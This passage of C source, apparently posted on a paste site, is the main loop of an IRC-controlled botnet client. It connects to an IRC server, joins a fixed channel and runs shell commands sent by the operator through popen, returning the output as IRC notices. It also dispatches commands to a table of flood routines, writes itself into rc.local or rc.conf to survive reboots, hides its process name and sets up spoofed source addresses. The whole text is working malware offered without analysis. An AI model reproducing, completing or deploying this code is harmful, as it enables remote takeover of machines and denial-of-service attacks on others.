  709.                 if (strwildmatch(message,nick)) return;
  710.                 message+=i+1;
  711.                 if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
  712.                 if (!strncmp(message,"SH ",3)) {
  713.                         char buf[1024];
  714.                         FILE *command;
  715.                         if (mfork(sender) != 0) return;
  716.                         memset(buf,0,1024);
  717.                         sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
  718.                         command=popen(buf,"r");
  719.                         while(!feof(command)) {
  720.                                 memset(buf,0,1024);
  721.                                 fgets(buf,1024,command);
  722.                                 Send(sock,"NOTICE %s :%s\n",sender,buf);
  723.                                 sleep(1);
  724.                         }
  725.                         pclose(command);
  726.                         exit(0);
  727.                 }
  728.                 m=strlen(message);
  729.                 for (i=0;i<m;i++) {
  730.                         if (*message == ' ' || *message == 0) break;
  731.                         name[i]=*message;
  732.                         message++;
  733.                 }
  734.                 for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
  735.                 num_params++;
  736.                 if (num_params > 10) num_params=10;
  737.                 params[0]=name;
  738.                 params[num_params+1]="\0";
  739.                 m=1;
  740.                 while (*message != 0) {
  741.                         message++;
  742.                         if (m >= num_params) break;
  743.                         for (i=0;i<strlen(message) && message[i] != ' ';i++);
  744.                         params[m]=(char*)malloc(i+1);
  745.                         strncpy(params[m],message,i);
  746.                         params[m][i]=0;
  747.                         m++;
  748.                         message+=i;
  749.                 }
  750.                 for (m=0; flooders[m].cmd != (char *)0; m++) {
  751.                         if (!strcasecmp(flooders[m].cmd,name)) {
  752.                                 flooders[m].func(sock,sender,num_params-1,params);
  753.                                 for (i=1;i<num_params;i++) free(params[i]);
  754.                                 return;
  755.                         }
  756.                 }
  757.         }
  758. }
  759. void _376(int sock, char *sender, char *str) {
  760.         Send(sock,"MODE %s -xi\n",nick);
  761.         Send(sock,"JOIN %s :%s\n",chan,key);
  762.         Send(sock,"WHO %s\n",nick);
  763. }
  764. void _PING(int sock, char *sender, char *str) {
  765.         Send(sock,"PONG %s\n",str);
  766. }
  767. void _352(int sock, char *sender, char *str) {
  768.         int i,d;
  769.         char *msg=str;
  770.         struct hostent *hostm;
  771.         unsigned long m;
  772.         for (i=0,d=0;d<5;d++) {
  773.                 for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  774.                 if (i == strlen(str)) return;
  775.         }
  776.         for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  777.         msg[i]=0;
  778.         if (!strcasecmp(msg,nick) && !spoofsm) {
  779.                 msg=str;
  780.                 for (i=0,d=0;d<3;d++) {
  781.                         for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  782.                         if (i == strlen(str)) return;
  783.                 }
  784.                 for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  785.                 msg[i]=0;
  786.                 if ((m = inet_addr(msg)) == -1) {
  787.                         if ((hostm=gethostbyname(msg)) == NULL) {
  788.                                 Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
  789.                                 return;
  790.                         }
  791.                         memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  792.                 }
  793.                 ((char*)&spoofs)[3]=((char*)&m)[0];
  794.                 ((char*)&spoofs)[2]=((char*)&m)[1];
  795.                 ((char*)&spoofs)[1]=((char*)&m)[2];
  796.                 ((char*)&spoofs)[0]=0;
  797.                 spoofsm=256;
  798.         }
  799. }
  800. void _433(int sock, char *sender, char *str) {
  801.         free(nick);
  802.         nick=makestring();
  803. }
  804. void _NICK(int sock, char *sender, char *str) {
  805.   int i;
  806.         for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  807.         sender[i]=0;
  808.   if (!strcasecmp(sender,nick)) {
  809.     if (*str == ':') str++;
  810.     if (nick) free(nick);
  811.     nick=strdup(str);
  812.   }
  813. }
  814. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
  815.         { "352", _352 },
  816.         { "376", _376 },
  817.         { "433", _433 },
  818.         { "422", _376 },
  819.         { "PRIVMSG", _PRIVMSG },
  820.         { "PING", _PING },
  821.   { "NICK", _NICK },
  822. { (char *)0, (void (*)(int,char *,char *))0 } };
  823. void con() {
  824.         struct sockaddr_in srv;
  825.         unsigned long ipaddr,start;
  826.         int flag;
  827.         struct hostent *hp;
  828. start:
  829.   sock=-1;
  830.   flag=1;
  831.   if (changeservers == 0) server=servers[rand()%numservers];
  832.   changeservers=0;
  833.         while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
  834.   if (inet_addr(server) == 0 || inet_addr(server) == -1) {
  835.     if ((hp = gethostbyname(server)) == NULL) {
  836.       server=NULL;
  837.       close(sock);
  838.       goto start;
  839.     }
  840.     bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
  841.   }
  842.   else srv.sin_addr.s_addr=inet_addr(server);
  843.         srv.sin_family = AF_INET;
  844.         srv.sin_port = htons(6667);
  845.   ioctl(sock,FIONBIO,&flag);
  846.   start=time(NULL);
  847.   while(time(NULL)-start < 10) {
  848.     errno=0;
  849.     if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
  850.             setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  851.             setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  852.             setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  853.       return;
  854.     }
  855.     if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
  856.     sleep(1);
  857.   }
  858.   server=NULL;
  859.   close(sock);
  860.   goto start;
  861. }
  862. int main(int argc, char **argv) {
  863.         int on,i;
  864.         char cwd[256],*str;
  865.         FILE *file;
  866. #ifdef STARTUP
  867.   str="/etc/rc.d/rc.local";
  868.   file=fopen(str,"r");
  869.   if (file == NULL) {
  870.     str="/etc/rc.conf";
  871.     file=fopen(str,"r");
  872.   }
  873.         if (file != NULL) {
  874.                 char outfile[256], buf[1024];
  875.                 int i=strlen(argv[0]), d=0;
  876.                 getcwd(cwd,256);
  877.                 if (strcmp(cwd,"/")) {
  878.                         while(argv[0][i] != '/') i--;
  879.                         sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  880.                         while(!feof(file)) {
  881.                                 fgets(buf,1024,file);
  882.                                 if (!strcasecmp(buf,outfile)) d++;
  883.                         }
  884.                         if (d == 0) {
  885.                                 FILE *out;
  886.                                 fclose(file);
  887.                                 out=fopen(str,"a");
  888.                                 if (out != NULL) {
  889.                                         fputs(outfile,out);
  890.                                         fclose(out);
  891.                                 }
  892.                         }
  893.                         else fclose(file);
  894.                 }
  895.                 else fclose(file);
  896.         }
  897. #endif
  898.         if (fork()) exit(0);
  899. #ifdef FAKENAME
  900.   strncpy(argv[0],FAKENAME,strlen(argv[0]));
  901.         for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
  902. #endif
  903.         srand((time(NULL) ^ getpid()) + getppid());
  904.         nick=makestring();
  905.         ident=makestring();
  906.         user=makestring();
  907.         chan=CHAN;
  908.   key=KEY;
  909.   server=NULL;
  910. sa:
  911. #ifdef IDENT
  912.         for (i=0;i<numpids;i++) {
  913.                 if (pids[i] != 0 && pids[i] != getpid()) {
  914.                         kill(pids[i],9);
  915.       waitpid(pids[i],NULL,WNOHANG);
  916.                 }
  917.         }
  918.   pids=NULL;
  919.   numpids=0;
  920.   identd();
  921. #endif
  922.   con();
  923.         Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
  924.         while(1) {
  925.                 unsigned long i;
  926.                 fd_set n;
  927.                 struct timeval tv;
  928.                 FD_ZERO(&n);
  929.                 FD_SET(sock,&n);
  930.                 tv.tv_sec=60*20;
  931.                 tv.tv_usec=0;
  932.                 if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
  933.                 for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
  934.                         unsigned int *newpids,on;
  935.                         for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
  936.       pids[on-1]=0;
  937.                         numpids--;
  938.                         newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  939.                         for (on=0;on<numpids;on++) newpids[on]=pids[on];
  940.                         free(pids);
  941.                         pids=newpids;
  942.                 }
  943.                 if (FD_ISSET(sock,&n)) {
  944.                         char buf[4096], *str;
  945.                         int i;
  946.                         if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
  947.                         buf[i]=0;
  948.                         str=strtok(buf,"\n");
  949.                         while(str && *str) {
  950.                                 char name[1024], sender[1024];
  951.                                 filter(str);
  952.                                 if (*str == ':') {
  953.                                         for (i=0;i<strlen(str) && str[i] != ' ';i++);
  954.                                         str[i]=0;
  955.                                         strcpy(sender,str+1);
  956.                                         strcpy(str,str+i+1);
  957.                                 }
  958.                                 else strcpy(sender,"*");
  959.                                 for (i=0;i<strlen(str) && str[i] != ' ';i++);
  960.                                 str[i]=0;
  961.                                 strcpy(name,str);
  962.                                 strcpy(str,str+i+1);
  963.                                 for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
  964.                                 if (!strcasecmp(name,"ERROR")) goto sa;
  965.                                 str=strtok((char*)NULL,"\n");
  966.                         }
  967.                 }
  968.         }
  969.         return 0;
  970. }
Add Comment
Please, Sign In to add comment